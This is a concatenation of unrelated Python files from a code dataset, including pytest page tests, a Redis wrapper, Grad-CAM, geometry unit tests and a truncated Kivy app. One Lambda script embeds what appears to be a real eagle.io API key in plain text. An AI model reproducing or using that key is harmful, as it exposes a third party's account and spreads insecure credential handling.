page.solve_quiz_and_get_code()\n page.should_be_message_about_adding()\n page.should_be_message_basket_total()\n\n def test_user_cant_see_success_message(self, browser):\n page = ProductPage(browser, link)\n page.open()\n page.should_not_be_success_message()\n\n\ndef test_guest_should_see_login_link_on_product_page(browser):\n page = ProductPage(browser, link)\n page.open()\n page.should_be_login_link()\n\n\n@pytest.mark.need_review\ndef test_guest_can_add_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n page.solve_quiz_and_get_code()\n page.should_be_message_about_adding()\n page.should_be_message_basket_total()\n\n\ndef test_guest_cant_see_success_message_after_adding_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n page.should_not_be_success_message()\n\n\ndef test_guest_cant_see_success_message(browser):\n page = ProductPage(browser, link)\n page.open()\n page.should_not_be_success_message()\n\n\ndef test_message_dissapeared_after_adding_product_to_cart(browser):\n page = ProductPage(browser, link)\n page.open()\n page.add_to_backet()\n page.should_be_disappeared_success_message()\n\n\n@pytest.mark.need_review\ndef test_guest_can_go_to_login_page_from_product_page(browser):\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n\n\n@pytest.mark.need_review\ndef test_guest_cant_see_product_in_cart_opened_from_product_page(browser):\n page = ProductPage(browser, link)\n page.open()\n page.go_to_cart_page()\n cart_page = CartPage(browser, browser.current_url)\n cart_page.should_be_cart_link()\n cart_page.should_be_empty_cart()\n cart_page.should_be_message_empty()\n","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461265258","text":"def Sequence(user):\r\n \r\n my_list = []\r\n \r\n for i in user:\r\n if i in [\"(\"]:\r\n my_list.append(i)\r\n else:\r\n \r\n if not my_list:\r\n return False\r\n current = my_list.pop()\r\n if current == '(':\r\n if i != \")\":\r\n return False\r\n\r\n if my_list:\r\n return False\r\n return True\r\n \r\n \r\n# Driver Code\r\nif __name__ == \"__main__\":\r\n user = \"()()\"\r\n\r\n if Sequence(user):\r\n print(\"Balanced\")\r\n else:\r\n print(\"Not Balanced\")\r\n\r\nif __name__ == \"__main__\":\r\n user = \"()(\"\r\n\r\n if Sequence(user):\r\n print(\"Balanced\")\r\n else:\r\n print(\"Not Balanced\")","sub_path":"4. brackets.py","file_name":"4. brackets.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40735050","text":"import httplib2\r\nimport json\r\n\r\ndef lambda_handler(json_input, context):\r\n # Set node id and value as required\r\n node_id = '@proj5' # note: customId's start with '@' \r\n node_value = json_input # generate random number between 0-100 for this example\r\n \r\n # Set api key and resource endpoint\r\n api_key = 'ZIhkkr1OU4NFJJfTtb8uu6FSQXZHz8bnHfonTIcp' # you can generate an API key from account settings\r\n api_path = 'https://api.eagle.io/api/v1/'\r\n api_resource = 'nodes/' + node_id + '/historic/now'\r\n \r\n # Build http request\r\n req_uri = api_path + api_resource\r\n req_method = 'PUT' \r\n req_headers = {'Content-Type': 'application/json', 'X-Api-Key': api_key}\r\n req_body = {'value': node_value} # optionally include timestamp and quality:\r\n # {'value': 15, 'timestamp': '2017-07-14T23:38:00Z', 'quality': 149}\r\n \r\n # Send http request and get response\r\n http = httplib2.Http()\r\n response, content = http.request(req_uri, req_method, json.dumps(req_body), req_headers)\r\n\r\n # Parse content as json\r\n data = json.loads(content)\r\n\r\n return data\r\n\r\ndata = lambda_handler(10,0)\r\nprint(data)","sub_path":"Outdated/SendToEagleIOTest.py","file_name":"SendToEagleIOTest.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340638176","text":"#pass new positions as a tuple (a, b) where a is horizontal and b is vertical\n\nclass King:\n def __init__(self, position, color, board):\n self.pos = position\n self.col = color\n self.id = \"King\"\n self.board = board\n\n def move(self, new_pos):\n #new positions are in a valid 8x8 board\n if new_pos[0] < 8 and new_pos[1] < 8:\n #hor and ver both less than 1\n if abs(self.pos[0] - new_pos[0]) <= 1 and abs(self.pos[1] - new_pos[1]) <= 1:\n #if spot is empty:\n if self.board[new_pos[0]][new_pos[1]] == []:\n print(\"King from\", self.pos, \"to\", new_pos)\n self.board[self.pos[0]][self.pos[1]] = []\n self.board[new_pos[0]][new_pos[1]] = self\n self.pos = new_pos\n return True\n #if spot is taken by opposing colored piece\n elif self.board[new_pos[0]][new_pos[1]] != [] and self.board[new_pos[0]][new_pos[1]].col != self.col:\n print(\"King from\", self.pos, \"takes\", self.board[new_pos[0]][new_pos[1]].id, \"on\", new_pos)\n self.board[self.pos[0]][self.pos[1]] = []\n self.board[new_pos[0]][new_pos[1]] = self\n self.pos = new_pos\n return True\n else:\n self.error(new_pos)\n else:\n self.error(new_pos)\n else:\n self.error(new_pos)\n\n def error(self, new_pos):\n print(\"The new position\", new_pos, \"is illegal. Please enter a new position.\")\n return False","sub_path":"King.py","file_name":"King.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105023189","text":"import pandas as pd\nimport fire\nfrom functools import reduce\n\ndef readIN(sample=\"BC1C\",out=\"BC1C.gcContents.txt\"):\n df1=pd.read_csv(f\"GCs/{sample}.upstream.gc.txt\",sep=\"\\t\")\n df1.columns=[\"ecc\",\"upstream\"]\n df2=pd.read_csv(f\"GCs/{sample}.ecc.gc.txt\",sep=\"\\t\")\n df2.columns=[\"ecc\",\"self\"]\n df3=pd.read_csv(f\"GCs/{sample}.downstream.gc.txt\",sep=\"\\t\")\n df3.columns=[\"ecc\",\"downstream\"]\n fin=reduce(lambda x,y:pd.merge(x,y,on=\"ecc\",how=\"outer\"), [df1,df2,df3])\n fin.to_csv(f\"GCs/{out}\",sep=\"\\t\",index=False)\n\nif __name__ == '__main__':\n fire.Fire(readIN)","sub_path":"scripts/utils/calGC.py","file_name":"calGC.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"509242519","text":"class Solution:\n def get_next_stat(self, x):\n s='croak'\n return s[(s.index(x)+1)%len(s)]\n\n def minNumberOfFrogs(self, croakOfFrogs: str) -> int:\n\n if croakOfFrogs[0]!= 'c':\n return -1\n frog_idx = 1\n frog_dict = {self.get_next_stat('c'):[frog_idx]}\n ret = 0\n for item in croakOfFrogs[1:]:\n \"\"\"\n 该字符符合条件\n \"\"\"\n if item in frog_dict:\n next_key = self.get_next_stat(item)\n this_frog = frog_dict[item].pop()\n frog_dict[next_key]=frog_dict.get(next_key, [])\n frog_dict[next_key].append(this_frog)\n if not frog_dict[item]: frog_dict.pop(item)\n else:\n # 新增青蛙叫不出来\n if item!='c':\n return -1\n next_key = self.get_next_stat(item)\n frog_dict[next_key]=frog_dict.get(next_key, [])\n frog_idx += 1\n this_frog = frog_idx\n frog_dict[next_key].append(this_frog)\n for key, value in frog_dict.items():\n ret += len(value)\n if ret!=len(frog_dict.get('c',[])):\n return -1\n return ret\n\n\"\"\"\n2^2\n\n\"\"\"\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.get_next_stat(\"k\"))\n\n params = \"croakcroakcroakcroakcroakcroakcroakcroak\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==1\n\n print(s.get_next_stat(\"c\"))\n params = \"crcoakroak\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==2\n\n params = \"croakcrook\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==-1\n\n params = \"croakcroa\"\n ans = s.minNumberOfFrogs(params)\n print(ans)\n assert ans==-1\n params = \"croakcroakcroakcroakcroakcroakcroakcroakk\"\n ans = s.minNumberOfFrogs(params)\n print(ans)","sub_path":"contests/week185/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"185844853","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom bs4 import BeautifulSoup\nfrom collections import Counter\nfrom scipy.interpolate import spline\n\nimport matplotlib as mpl\n\nmpl.use(\"Agg\")\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\n\ndef main(input_filename, output_filename):\n\n with open(input_filename, \"r\", encoding=\"utf8\") as f:\n xml = f.read()\n\n soup = BeautifulSoup(xml, \"lxml\")\n\n y = []\n for record in soup.xml.records:\n try:\n year = record.dates.year.text.strip()\n y.append(int(year))\n except AttributeError:\n # Sometimes we end up on a NavigableString node,\n # which won't have any child nodes. Just skip it\n pass\n\n counter = Counter(y)\n\n years = sorted([int(x) for x in counter.keys()])\n count = []\n for c in sorted(counter.keys()):\n count.append(counter[c])\n total = list(np.cumsum(count))\n\n ax1 = plt.figure().add_subplot(111)\n ax1.bar(years, count, color=\"#FF8888\", label=\"Publications\")\n plt.ylabel(\"Peer-Reviewed Publications\")\n\n ynew = np.linspace(min(years), max(years), 100)\n smooth = spline(years, total, ynew)\n\n ax2 = plt.twinx()\n ax2.plot(ynew, smooth, label=\"Cumulative\")\n\n rows = [\"Publications\", \"Cumulative\"]\n table = plt.table(\n cellText=[count, total], rowLabels=rows, colLabels=years, loc=\"bottom\"\n )\n\n props = table.properties()\n cells = props[\"child_artists\"]\n for cell in cells:\n cell.set_height(0.1)\n cell.set_width(0.104)\n\n red = mpatches.Patch(color=\"#FF8888\", label=\"Publications\")\n blue = mpatches.Rectangle((0, 0), 1, 8, color=\"#1F77B4\", label=\"Cumulative\")\n plt.legend(handles=[red, blue])\n\n ax2.set_ylim(ymin=0)\n\n plt.savefig(output_filename, bbox_inches=\"tight\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Generate svg graph of TCIA papers by year\")\n\n parser.add_argument(\n 'input_file',\n help='EndNote XML export file'\n )\n parser.add_argument(\n 'output_file',\n help='Output filename, SVG'\n )\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.input_file, args.output_file)\n","sub_path":"make_graph.py","file_name":"make_graph.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273425959","text":"user_input = input(\"Hello, what is your name? \")\n\nfirst_letter = user_input[0].upper()\n\neverything_else = user_input[1:].lower()\n\ncorrect_name = first_letter + everything_else\n\nprint(\"Hello,\", correct_name)\n\n# name part finished\n\nbrand_question = input(\"What is your favorite brand? \")\n\n\nshoes = [{\n \"name\": \"Freeruns\",\n \"year\": 2020,\n \"brand\": \"nike\",\n \"stock\": True,\n},\n {\n \"name\": \"Air\",\n \"year\": 2018,\n \"brand\": \"jordan\",\n \"stock\": False,\n},\n {\n \"name\": \"High-Top\",\n \"year\": 2021,\n \"brand\": \"sketchers\",\n \"stock\": True,\n},\n {\n \"name\": \"oldschool\",\n \"year\": 2016,\n \"brand\": \"Vans\",\n \"stock\": False\n}\n]\n\n\n\nfor i in range(4):\n if(brand_question.lower() == shoes[i].get(\"brand\") and shoes[i].get(\"stock\")):\n print(shoes[i].get(\"brand\"), \"is currently in stock!\")\n\n\n\n# found = False\n\n\n# for i in range(4):\n# if(name_question == shoes[i].get(\"name\")):\n# print(shoes[i].get(\"name\"), \"is currently in stock!\")\n# found = True\n \n \n# if(not found):\n# print(\"Sorry, piss off!\")\n\n\n# if(name_question == shoes[i].get(\"name\")):\n# print(shoes[i].get(\"name\"), \"is currently in stock!\")\n# else:\n# print(\"Sorry, piss off!\")\n\n\n\n\n","sub_path":"forwhilestock.py","file_name":"forwhilestock.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248267807","text":"\nimport os.path\nimport os\nimport socket\nimport redis\nfrom redis.exceptions import (\n ConnectionError,\n )\n\nfrom time import time\n\nclass DitchRedisHandler(object):\n\n def __init__(self,host,port,db):\n self.host= host\n self.port = port\n self.db = db\n self.redis = None\n self.isConnected = False\n self.myid = \"None\"\n\n def redisConnect(self):\n\n self.myid = 'server:' + socket.gethostname() + \":%d\" % os.getpid()\n self.lprint(\"Connect to Redis on %s:%s DB=%s\" % (self.host,self.port,self.db))\n self.redis = redis.StrictRedis(host=self.host, port=self.port, db=self.db)\n\n try:\n self.redis.ping()\n self.lprint(\"Done..\")\n self.isConnected = True\n except ConnectionError:\n # Failed to connect to redist..\n self.lprint(\"Redis connect failed..\")\n self.redis = None\n self.isConnected = False\n return False\n except Exception as e:\n self.lprint(\"General exception thrown connecting to redis.\")\n\n return True\n\n def redisDisconnect(self):\n # We are ending now.. deregister with redis\n self.hdel(self.myid)\n self.srem('servers',self.myid)\n self.lprint(\"Deregistered from redis server.\")\n\n def hset(self,hash,key,value):\n\n try:\n self.redis.hset(hash,key,value)\n except:\n # Failed.. perhaps redis is down?\n self.isConnected = False\n return False\n return True\n\n def hget(self,hash,key):\n\n try:\n return self.redis.hget(hash,key)\n except:\n # Failed.. perhaps redis is down?\n self.isConnected = False\n return None\n\n def hdel(self,key):\n\n try:\n self.redis.hdel(key)\n except:\n self.isConnected = False\n\n def sadd(self,setname,value):\n\n try:\n self.redis.sadd(setname,value)\n except:\n self.isConnected = False\n\n def srem(self,setname,value):\n\n try:\n self.redis.srem(setname,value)\n except:\n # Failed.. perhaps redis is down?\n self.isConnected = False\n return False\n return True\n\n def lpush(self,listname,value):\n\n try:\n self.redis.lpush(listname,value)\n except:\n self.isConnected = False\n\n def rpop(self,listname):\n\n try:\n return self.redis.rpop(listname)\n except:\n self.isConnected = False\n return None\n\n def brpop(self,listname,timeout):\n\n try:\n return self.redis.brpop(listname,timeout)\n except:\n self.isConnected = False\n return None\n\n def exists(self,key):\n\n try:\n return self.redis.exists(key)\n except:\n self.isConnected = False\n return False\n\n","sub_path":"webapp/ditch/ditchmon/Ditch/DitchRedisHandler.py","file_name":"DitchRedisHandler.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18151555","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nfrom typing import Tuple\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass CamExtractor(object):\n \"\"\" Extractor for GradCam\"\"\"\n\n model: nn.Module\n target_layer: int\n gradients: torch.Tensor\n do_explicit_flatten: bool\n verbose: bool\n\n def __init__(self, model: nn.Module, target_layer: int,\n do_explicit_flatten: bool = False,\n verbose: bool = True) -> None:\n self.model = model\n self.target_layer = target_layer\n self.gradients = None\n self.do_explicit_flatten = do_explicit_flatten\n self.verbose = verbose\n\n def save_gradient(self, grad: torch.Tensor) -> None:\n \"\"\" save backward gradient to member variable \"\"\"\n self.gradients = grad\n\n def forward_pass(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Does a forward pass and hooks the function at given layer\n \"\"\"\n conv_output = None\n\n module_num = len(list(self.model.children()))\n for module_pos, module in enumerate(list(self.model.children())):\n if self.do_explicit_flatten and module_pos == module_num - 1:\n x = x.view(x.size(0), -1)\n\n x = module(x) # Forward\n if int(module_pos) == self.target_layer:\n if self.verbose:\n print('layer to hook: \\n{}'.format(module))\n\n x.register_hook(self.save_gradient)\n conv_output = x # Save the convolution output on that layer\n\n return conv_output, x\n\n\nclass GradCam(object):\n \"\"\"\n Grad-Cam\n Produces class activation map\n https://arxiv.org/abs/1610.02391\n https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/gradcam.py\n \"\"\"\n\n model: nn.Module\n extractor: CamExtractor\n verbose: bool\n\n def __init__(self, model: nn.Module, target_layer: int,\n device: torch.device=None,\n scanner_args: dict = {},\n verbose: bool = True) -> None:\n self.device = device\n if device is None: # Not Specified\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu')\n\n self.model = model.to(self.device)\n for param in self.model.parameters():\n param.requires_grad = True\n self.model.eval()\n # Define extractor\n scanner_args['verbose'] = verbose\n self.extractor = CamExtractor(self.model, target_layer, **scanner_args)\n\n def generate_cam(self,\n input_image: torch.Tensor,\n target_class: int\n ) -> np.ndarray:\n \"\"\" generate gradcam heatmap \"\"\"\n\n # Full forward pass\n # conv_output is the output of convolutions as specified layer\n # model_output is the final output of the model (1, num_classes)\n conv_output, model_output = self.extractor.forward_pass(input_image)\n if target_class is None:\n # set argmax to target class in case not specified\n target_class = np.argmax(model_output.data.numpy())\n\n # Target for backprop\n one_hot_output = torch.FloatTensor(\n 1, model_output.size()[-1]).to(self.device).zero_()\n one_hot_output[0][target_class] = 1\n\n # Zero grads\n self.model.zero_grad()\n\n # Backward pass with specified target\n model_output.backward(gradient=one_hot_output, retain_graph=True)\n\n # Get hooked gradients\n guided_gradients = self.extractor.gradients.cpu().data.numpy()[0]\n\n # Get convolution outputs\n target = conv_output.cpu().data.numpy()[0]\n\n # Get weights from gradients by taking averages\n weights = np.mean(guided_gradients, axis=(1, 2))\n\n # Create empty numpy array for cam\n cam: np.ndarray = np.ones(target.shape[1:], dtype=np.float32)\n\n # Multiply each weights with its conv output and sum\n for i, weight in enumerate(weights):\n cam += weight * target[i, :, :]\n\n cam = cv2.resize(cam, (224, 224))\n cam = np.maximum(cam, 0)\n cam = (cam - np.min(cam)) / (np.max(cam) -\n np.min(cam)) # Normalize between 0-1\n cam = np.uint8(cam * 255) # Scale between 0-255 to visualize\n return cam\n","sub_path":"cnn_visualization/gradcam/gradcam.py","file_name":"gradcam.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"558570866","text":"#controlla lettera x lettera la corr. nel codice\ndef controlla_parola(strutt,parola,codice):\n segnaposto=0\n for lettera in parola:\n for x,y in strutt.items():\n if check(parola,lettera,segnaposto,codice,x,y):\n return False\n segnaposto=parola.index(lettera,segnaposto)+1\n return True\n\ndef check(parola,lettera,segnaposto,codice,x,y):\n i=parola.index(lettera,segnaposto)\n z=codice[i]\n if (x!= lettera and y== z) or (x == lettera and y != z):\n return True\n return False\n\n#prepara la parola al controllo\ndef elabora_parola(parola,codice):\n parola=parola[:-1]\n strutt={}\n for lettera in parola:\n if lettera not in strutt:\n strutt[lettera]=codice[parola.index(lettera)]\n return strutt,parola \n \n#funzione principale\ndef decod(pfile, codice):\n \n parole=leggi_file(pfile)\n\n insieme=set()\n l=len(codice)+1\n \n for parola in parole:\n if len(parola)==l:\n strutt,parola=elabora_parola(parola,codice)\n if controlla_parola(strutt,parola,codice):\n insieme.add(parola)\n \n return insieme\n\n#restituisce una lista di parole\ndef leggi_file(pfile):\n file = open(pfile, \"r\")\n parole=file.readlines()\n file.close()\n return parole\n","sub_path":"students/1806198/homework02/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"213163256","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch\n\n\nclass Two_FC_layer(torch.nn.Module):\n def __init__(self, rgb_dim=2048, OF_dim = 2048, reduced_dim=128, fc_dim = 64, num_classes=7):\n super(Two_FC_layer, self).__init__()\n self.reduced_rgb = nn.Linear(rgb_dim, reduced_dim, bias=False)\n self.reduced_OF = nn.Linear(OF_dim, reduced_dim, bias=False)\n self.rgb = rgb_dim\n self.OF = OF_dim\n\n self.fc1 = nn.Linear(2*reduced_dim, fc_dim, bias=False)\n self.fc2 = nn.Linear(fc_dim, fc_dim, bias=False)\n self.class_dim = nn.Linear(fc_dim, out_features=num_classes, bias=False) # output\n\n def forward(self, x):\n temp = torch.cat((self.reduced_rgb(x[:, 0:self.rgb]), self.reduced_OF(x[:, self.rgb : (self.rgb+self.OF)])), dim=1)\n out = self.class_dim(self.fc2(self.fc1(temp)))\n return out\n\n\n\n\n","sub_path":"RGB_OF/2FC/two_FC_layer_model_RGB_OF.py","file_name":"two_FC_layer_model_RGB_OF.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63753312","text":"import os\nimport unittest\nfrom unittest import mock\n\nfrom Geometria_.model.Geometria import Geometria as g\nfrom Geometria_.view.View import View\nfrom Geometria_ import main\n\nclass TestGeometria(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n print('setUpClass() -> OK')\n self.obj_geometria_1 = g(1, 2, 3)\n self.obj_geometria_2 = g(12, -1, 100)\n self.obj_geometria_3 = g(1.2, -2.2, 33)\n\n #Data definition for test cases\n def setUp(self):\n print('SetUp() -> OK')\n self.r = 0\n self.r_a = []\n self.obj_geometria_1 = g(1, 2, 3)\n self.obj_geometria_2 = g(12, -1, 100)\n self.obj_geometria_3 = g(1.2, -2.2, 33)\n self.obj_geometria_4 = g(1, 2, 3)\n\n self.valores_a = [1, 2, 3, 4, 5, 6, 7, 8]\n self.valores_b = [2, 3, 5, 6, 7, 2, 6, 1]\n self.valores_sw = [range(1,8)]\n\n self.figuras = {1 : \"Cuadrado\",2 : \"Circulo\",3 : \"Triangulo\",4 : \"Rectangulo\",5 : \"Pentagono\",6 : \"Rombo\",7 : \"Romboide\",8 : \"Trapecio\"}\n\n ###Test cases for each geometric form of the model\n def test_areaCuadrado(self):\n r = g.areaCuadrado(self,self.obj_geometria_1.a)\n #r_2 = g.areaCuadrado(self,self.obj_geometria_3.b)\n\n self.assertEqual(r, self.obj_geometria_1.a * self.obj_geometria_1.a)\n #self.assertEqual(r_2, self.obj_geometria_3.b * self.obj_geometria_3.b)\n print('test_areaCuadrado() - > OK')\n\n\n def test_areaCirculo(self):\n PI = 3.1416\n #Calculamos de forma manual el area para evaluarlo\n aux_res = [PI * pow(n,2) for n in self.valores_a]\n r_a = [g.areaCirculo(self,n) for n in self.valores_a]\n self.assertEqual(r_a,aux_res)\n\n print('test_areaCirculo() - > OK')\n\n def test_areaTiangulo(self):\n r = g.areaTiangulo(self,self.obj_geometria_1.a,self.obj_geometria_1.b)\n self.assertEqual(r, (self.obj_geometria_1.a * self.obj_geometria_1.b) / 2.0 )\n print('test_areaTiangulo() - > OK')\n\n\n def test_areaRectangulo(self):\n aux_res = [n[0] * n[1] for n in zip(self.valores_a,self.valores_b )]\n r_a = [g.areaRectangulo(self,n[0],n[1] ) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaRectangulo() - > OK')\n\n def test_areaPentagono(self):\n aux_res = [(n[0] * n[1]) / 2.0 for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaPentagono(self, n[0], n[1]) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaPentagono() - > OK')\n\n def test_areaRombo(self):\n aux_res = [(n[0] * n[1]) / 2.0 for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaRombo(self, n[0], n[1]) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaRombo() - > OK')\n\n\n def test_areaRomboide(self):\n aux_res = [(n[0] * n[1]) for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaRomboide(self, n[0], n[1]) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaRomboide() - > OK')\n\n\n def test_areaTrapecio(self):\n aux_res = [ ( ( ( n[0] + n[1]) / 2.0) * self.obj_geometria_2.a ) for n in zip(self.valores_a, self.valores_b)]\n r_a = [g.areaTrapecio(self, n[0], n[1],self.obj_geometria_2.a) for n in zip(self.valores_a, self.valores_b)]\n self.assertEqual(r_a, aux_res)\n print('test_areaTrapecio() - > OK')\n\n def test_init(self):\n r = g(1, 2, 3)\n self.assertEqual(r.a, self.obj_geometria_1.a)\n print('test_init() - > OK')\n\n def test_figuraname(self):\n\n for n in self.figuras:\n self.obj_geometria_3.set_figuraName(n)\n self.assertEqual(self.obj_geometria_3.figuraName, self.figuras[n])\n print('test_figuraname_{0}() - > OK'.format(self.figuras[n]))\n print('test_figuraname() - > OK')\n\n def test_switch(self):\n for n in self.valores_sw:\n self.assertEqual(self.obj_geometria_4.switch(n), self.obj_geometria_1.switch(n))\n print('test_switch_Opcion Menu :: {0} () - > OK'.format(n))\n\n #Test view file falidation\n def testView(self):\n v = View()\n result = v.select(self.obj_geometria_1)\n self.assertEqual(result, 0)\n\n def testMain(self):\n result = os.system(\"python main.py\")\n self.assertEqual(result, 0)\n\n #Release Resources\n def tearDown(self):\n del self.r\n del self.r_a\n del self.obj_geometria_1\n del self.obj_geometria_2\n del self.obj_geometria_3\n print('tearDown() - > OK')\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"2021-online-py-02-unittest-master/Geometria_/test/TestGeometria.py","file_name":"TestGeometria.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"46563197","text":"import kivy\n\nfrom kivy.app import App\nfrom kivy.uix.tabbedpanel import TabbedPanelHeader\nfrom kivy.uix.tabbedpanel import TabbedPanel\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.dropdown import DropDown\nfrom kivy.uix.slider import Slider\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\n\nclass Proforma(App):\n\tdef operations(click):\t\n\t\tpass\n\t\t\n\tdef build(self):\n\t#*******ROOTWIDGET*******\n\t\tlayout = GridLayout(rows=2)\t\t\n\t#*******SUB-WIDGETS*******\n\t\tlayoutTop = GridLayout(cols=3,rows=1)#SUB-WIDGET-1\n\t\tlayoutTop.size_hint = (1, 0.1)\n\t\tlayoutMid = FloatLayout()#SUB-WIDGET-2\n\t\tlayoutMid.size_hint = (1, 1)\n\t\t\n\t#*******CONTENT-OF-SUB-WIDGET-1*******\t\n\t\tmenubtn = Button(text='Menu')\n\t\tmenubtn.size_hint = (0.1, 0.1)\n\t\thead = Label(text='PRO-FORMA',size_hint_y = None,size_hint_x=None, width=200)\n\t\thead.size_hint = (0.8, 0.1)\n\t\tbackbtn = Button(text='Drop')\n\t\tbackbtn.size_hint = (0.1, 0.1)\n\t\t#dropbtn = Button()\n\t#*******CONTENT-OF-SUB-WIDGET-2*******\n\t\ttp_panel = TabbedPanel()\n\t\ttp_panel.default_tab_text = \"Global News\"\t\n\t\t\n\t\tlayoutnews = GridLayout(rows=2)\n\t\tupperlayout = GridLayout(cols=3, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40, size_hint_y=None, height = 50, size_hint_x=1)\n\t\tlowerlayout = GridLayout(row=1)\n\t\t\n\t\tupperlayout.add_widget(Button(text='S', size_hint=(0.1, None)))\n\t\tupperlayout.add_widget(TextInput(text='search', size_hint=(0.8, None), focus=True, multiline=False))\n\t\tupperlayout.add_widget(Button(text='settings', size_hint=(0.1, None)))\n\t\t\n\t\tlowerlayout.add_widget(Label())\n\t\t\n\t\tlayoutnews.add_widget(upperlayout)\n\t\tlayoutnews.add_widget(lowerlayout)\n\t\ttp_panel.default_tab_content = layoutnews\n\t\t\n\t\t#*******TAB1*******\t\n\t\tth_tab1 = TabbedPanelHeader(text = 'Pro-Forma')\n\t\t#*******SCROLLABILITY-WIDGET*******\n\t\tscroll = ScrollView(size_hint=(1, None), size=(800, 1000))\n\t\t\n\t\tmainlayout = GridLayout(cols = 1, spacing = 10, size_hint_y=None, size_hint_x=1)\n\t\tmainlayout.bind(minimum_height=mainlayout.setter('height'))\n\t\t#*******LAYOUT-FOR-PROPERTY-INFORMATION*******\n\t\tlayouttab1 = GridLayout(cols=2,rows=6, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40, size_hint_y=None, height = 250, size_hint_x=1)\n\t\t#*******LAYOUT-FOR-UNIT-MIX*******\n\t\tlayoutmix = GridLayout(cols=4, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40,size_hint_y=None, height = 80)\n\t\t#*******LAYOUT-FOR-EXPENSES*******\n\t\tlayoutexpense = GridLayout(cols=2, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40, size_hint_y=None, height = 960)\n\t\t#*******LAYOUT-FOR-ACCOUNTS*******\n\t\tlayoutacc = GridLayout(cols=2, pos_hint ={'center_x': .5, 'center_y': .5},row_force_default=True, row_default_height=40,size_hint_y=None, height = 240)\n\t\t#*******CONTENT1*****\n\t\tmainlayout.add_widget(Label(text='Property Information',size_hint=(None, 1)))\n\t\t#*******CONTENT2*******\n\t\tlayouttab1.add_widget(Label(text= 'Property Name', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Property Address', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Town/City', font_size=15, size_hint=(0.4, None)))\n\t\tlayouttab1.add_widget(TextInput(text='input', font_size=15, halign ='left', valign='middle',size_hint=(0.6, None),multiline=False, focus=True))\n\t\tlayouttab1.add_widget(Label(text= 'Asking Price', font_size=15, size_hint=(0.4, 